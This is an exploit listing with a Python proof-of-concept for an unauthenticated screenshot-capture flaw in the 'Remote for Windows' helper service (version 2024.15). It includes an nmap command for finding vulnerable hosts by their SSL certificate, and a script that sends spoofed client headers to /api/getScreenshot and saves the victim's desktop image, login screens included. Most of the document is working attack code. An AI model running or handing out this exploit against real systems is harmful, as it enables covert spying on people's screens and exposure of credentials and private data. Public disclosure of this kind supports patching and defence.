# Exploit Title: Windows 2024.15 - Unauthenticated Desktop Screenshot Capture
# Date: 2025-05-19
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://rs.ltd
# Software Link: https://rs.ltd/latest.php?os=win
# Version: 2024.15
# Tested on: Windows 10/11 with Remote for Windows (helper)
'''
Description:
- Exploits the getScreenshot API endpoint in Remote for Windows helper
service
- Works when "Allow unknown devices" setting is enabled (default: disabled)
- Captures current desktop including login screens (SYSTEM-level access)
Vulnerable Component:
- /api/getScreenshot endpoint with missing authentication checks
# Identification:
nmap -p- -T4 <TARGET_IP> --script ssl-cert
Look for SSL cert with subject: CN=SecureHTTPServer/O=Evgeny Cherpak/C=US
'''
#!/usr/bin/env python3
import requests
import sys
from urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
def capture_screenshot(ip, port, output_file):
try:
response = requests.get(
f"https://{ip}:{port}/api/getScreenshot",
headers={
"X-ClientToken": "exploit",
"X-HostName": "attacker-pc",
"X-HostFullModel": "exploit-device"
},
verify=False,
timeout=15
)
if response.status_code == 200 and
response.content.startswith(b'\xff\xd8'):
with open(output_file, 'wb') as f:
f.write(response.content)
print(f"[+] Saved: {output_file}")
return True
print(f"[-] Failed: HTTP {response.status_code}")
return False
except Exception as e:
print(f"[-] Error: {str(e)}")
return False
if __name__ == "__main__":
if len(sys.argv) < 4:
print(f"Usage: {sys.argv[0]} <IP> <PORT> <output.jpg>")
sys.exit(1)
sys.exit(0 if capture_screenshot(sys.argv[1], sys.argv[2], sys.argv[3])
else 1)
